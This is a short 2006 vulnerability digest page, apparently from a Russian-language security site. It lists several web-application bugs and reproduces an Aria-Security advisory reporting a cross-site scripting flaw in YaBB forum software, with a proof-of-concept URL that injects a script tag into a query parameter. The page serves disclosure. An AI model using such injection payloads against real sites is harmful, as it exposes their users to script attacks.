Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

PHPMyRing <= 4.2.0 (view_com. php) Remote SQL Injection

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

Directory Traversal vulnerability in IPCheck Monitor Server

Mambo/Joomla Component Remository v3.25 (mosConfig_absolu te_path) Remote File Inclusion Vulnerability

From:	outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:	11 августа 2006 г.
Subject:	Yabb XSS

########################################################################
###################

#Aria-Security.net Advisory #

#Discovered by: OUTLAW #

#< www.Aria-security.net > #

#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #

########################################################################
###################

#Software: YaBB

#Attack method: Cross Site Scripting

#

#

#Proof of Concept:

#

#index.
php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert(
"xss
")</script>

#

#----------------------------------------------------------

#

#Solution

#

#No Solutions

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]

#